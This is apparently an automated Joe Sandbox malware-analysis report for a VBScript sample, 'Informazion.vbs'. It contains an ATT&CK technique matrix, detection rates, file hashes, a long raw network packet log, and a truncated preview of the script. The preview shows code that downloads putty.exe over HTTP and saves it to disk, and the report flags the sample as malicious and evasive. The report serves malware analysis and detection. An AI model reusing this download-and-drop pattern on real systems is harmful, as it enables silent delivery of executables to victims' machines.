Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 1 Application Window Discovery | SMB/Windows Admin Shares | 1 Clipboard Data | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 221 Scripting | NTDS | 1 Account Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 13 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 System Owner/User Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | 1 Remote System Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | 2 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 24 System Information Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Source | Detection | Scanner | Label
Informazion.vbs | 5% | ReversingLabs |
Informazion.vbs | 15% | Virustotal |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\putty[1].exe | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\putty[1].exe | 3% | Virustotal |
C:\log.exe | 0% | ReversingLabs |
C:\log.exe | 3% | Virustotal |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/ | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0# | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/host/:/0123456789abcdefghijklmnopqrstuvwxyzABCDEF | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
the.earth.li | 93.93.131.124 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://the.earth.li/~sgtatham/putty/0.78/w32/putty.exe | false | | high
https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
93.93.131.124 | the.earth.li | United Kingdom | 44684 | MYTHICMythicBeastsLtdGB | false
            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:783911
            Start date and time:2023-01-13 16:03:36 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 10m 47s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:Informazion.vbs
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:16
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal76.evad.winVBS@3/2@1/1
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 0.1% (good quality ratio 0.1%)
            • Quality average: 88%
            • Quality standard deviation: 0%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 18
            • Number of non-executed functions: 193
            Cookbook Comments:
            • Found application associated with file extension: .vbs
            • Override analysis time to 240s for JS/VBS files not yet terminated
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            No simulations
                Process:C:\Windows\System32\wscript.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):1477416
                Entropy (8bit):7.105848296111733
                Encrypted:false
                SSDEEP:24576:OTyfiD4jBr22smnkqnYvx5IOPQA4joBYd6YTekB7N5qu2Bcjf59SD/Dv:D68bxSQApsRekBeZm8
                MD5:AEB47B393079D8C92169F1EF88DD5696
                SHA1:633602BAE798867894494717268CA818F923CA18
                SHA-256:D83494CFB155056118365455F5396401E97BD50A156242F2B5025A44C67095B1
                SHA-512:7ED48D1BF7E514A736A34842A5A3ED18ADE06A304B45C0520BD15C53CB95A8BF997C073030A88C1133C7DF6E5AD08F44FE1A89EE90C79499E6FD54CE3FCD1BA0
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                • Antivirus: Virustotal, Detection: 3%, Browse
                Joe Sandbox View:
                • Filename: 827837hj.xls, Detection: malicious, Browse
                Reputation:low
                Process:C:\Windows\System32\wscript.exe
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):1477416
                Entropy (8bit):7.105848296111733
                Encrypted:false
                SSDEEP:24576:OTyfiD4jBr22smnkqnYvx5IOPQA4joBYd6YTekB7N5qu2Bcjf59SD/Dv:D68bxSQApsRekBeZm8
                MD5:AEB47B393079D8C92169F1EF88DD5696
                SHA1:633602BAE798867894494717268CA818F923CA18
                SHA-256:D83494CFB155056118365455F5396401E97BD50A156242F2B5025A44C67095B1
                SHA-512:7ED48D1BF7E514A736A34842A5A3ED18ADE06A304B45C0520BD15C53CB95A8BF997C073030A88C1133C7DF6E5AD08F44FE1A89EE90C79499E6FD54CE3FCD1BA0
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                • Antivirus: Virustotal, Detection: 3%, Browse
                Joe Sandbox View:
                • Filename: 827837hj.xls, Detection: malicious, Browse
                Reputation:low
                File type:assembler source, ASCII text, with CRLF line terminators
                Entropy (8bit):5.091208463743103
                TrID:
                  File name:Informazion.vbs
                  File size:742
                  MD5:63a02673549906ceb1945b6503e586e2
                  SHA1:1699cc8e7a12a5c26f69d8157ddc05bf7926fca0
                  SHA256:ecaaf6651becfa0901ce06fcb3ec0f933233cec66f41ab680ff42d1d9ffd06e2
                  SHA512:b84ff2d3816a07b19f7d227a29983cceb6f22066c171b0f49233c1087093e5acd671581cfc3e46732413b93ca6c0bed4e66e69a66bec91cdfa68b8d532c5035e
                  SSDEEP:12:tM7AmHvtmpYI+pWHMw4xyVoR8sTDqDB99hN4vACiXp8+l/JtyoW/Xjyon:tCPtu+pWHP4xyCR82DqDB99j44CSp3kL
                  TLSH:DB01CB69E455E363478FB053C124C82CEAB0B18A1BB7B3103340E59EA021B78D9648EF
                  File Content Preview:dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")..dim bStrm: Set bStrm = createobject("Adodb.Stream")..xHttp.Open "GET", "https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe", False..xHttp.Send..Set environmentVars = WScript.CreateObject("WS
                  Icon Hash:e8d69ece869a9ec4
                  Jan 13, 2023 16:04:35.402971029 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.403125048 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.403239965 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.403296947 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.403316975 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.403376102 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.403404951 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.403424025 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.403462887 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.403507948 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.403660059 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.403760910 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.403927088 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.404031038 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.404098034 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.404202938 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.404288054 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.404366016 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.404581070 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.404664993 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.404855013 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.404947996 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.405034065 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.405113935 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.405217886 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.405297995 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.405483961 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.405561924 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.438546896 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.438730955 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.439461946 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.439580917 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.439944983 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.440048933 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.440179110 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.440263033 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.440881014 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.440970898 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.441591024 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.441700935 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.441958904 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.442047119 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.442090988 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.442161083 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.442630053 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.442715883 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.442845106 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.442918062 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.443202019 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.443280935 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.443708897 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.443809986 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.443963051 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.444037914 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.444469929 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.444549084 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.445266008 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.445354939 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.445379972 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.445461035 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.445734024 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.445806026 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.447451115 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.447582960 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.447582006 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.447604895 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.447671890 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.447674990 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.447690964 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.447745085 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.447774887 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.447793007 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.447823048 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.447850943 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.449810028 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.449882984 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.449942112 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.449947119 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.449964046 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.450007915 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.450074911 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.450090885 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.450148106 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.450187922 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.475246906 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.475389004 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.475455046 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.475481033 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.475517035 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.475517988 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.475564957 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.475572109 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.475603104 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.475635052 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.477436066 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.477667093 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.477694988 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.477827072 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.477880955 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.477952003 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.478627920 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.478741884 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.478938103 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.479022980 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.479130983 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.479190111 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.479203939 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.479263067 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.479355097 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.479409933 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.479505062 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.479564905 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.479578018 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.479635000 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.480756998 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.480889082 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.481621027 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.481848955 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.481900930 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.481914997 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.481937885 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.481950998 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.481990099 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.481996059 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.482045889 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.482070923 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.482079983 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.482089043 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.482121944 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.482153893 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.482192993 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.482254028 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.482305050 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.482367992 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.482379913 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.482438087 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.482470036 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.482532024 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.482630014 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.482708931 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.482819080 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.482901096 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.482948065 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.483010054 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.483062983 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.483124971 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.483143091 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.483211040 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.484014034 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.484112024 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.484128952 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.484188080 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.484200001 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.484261990 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.484314919 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.484376907 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.484399080 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.484476089 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.484513044 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.484584093 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.485007048 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.485100031 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.485129118 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.485141993 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.485162020 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.485193014 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.485866070 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.485981941 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.485996008 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.486015081 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.486058950 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.486104965 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.486303091 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.486347914 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.486356020 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.486392975 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.486443043 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.487453938 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.487544060 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.488219976 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.488313913 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.488873005 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.488972902 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.489737988 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.489861965 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.489871979 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.489968061 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.490386009 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.490464926 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.491652012 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.491766930 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.491939068 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.492036104 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.492116928 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.492182016 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.492707014 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.492804050 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.509900093 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.510113001 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.510133028 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.510200024 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.510205984 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.510222912 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.510260105 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.511059046 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.511205912 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.511329889 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.511399984 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.511703014 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.511778116 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.511852026 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.511914015 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.512074947 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.512135983 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.512145996 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.512203932 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.512384892 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.512460947 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.512913942 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.513019085 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.513979912 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.514086008 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.514179945 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.514262915 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.514266968 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.514280081 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.514347076 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.514348984 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.514369011 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.514378071 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.514415026 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.514429092 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.514448881 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.514453888 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.514484882 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.514499903 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.514520884 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.514525890 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.514556885 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.514589071 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.515587091 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.515714884 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.515721083 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.515782118 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.515990973 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.516081095 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.516093969 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.516143084 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.516156912 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.516184092 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.516361952 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.516520023 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.516750097 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.516952038 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.516957998 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.517151117 CET49700443192.168.2.393.93.131.124
                  Jan 13, 2023 16:04:35.520318985 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.520448923 CET4434970093.93.131.124192.168.2.3
                  Jan 13, 2023 16:04:35.520467997 CET49700443192.168.2.393.93.131.124
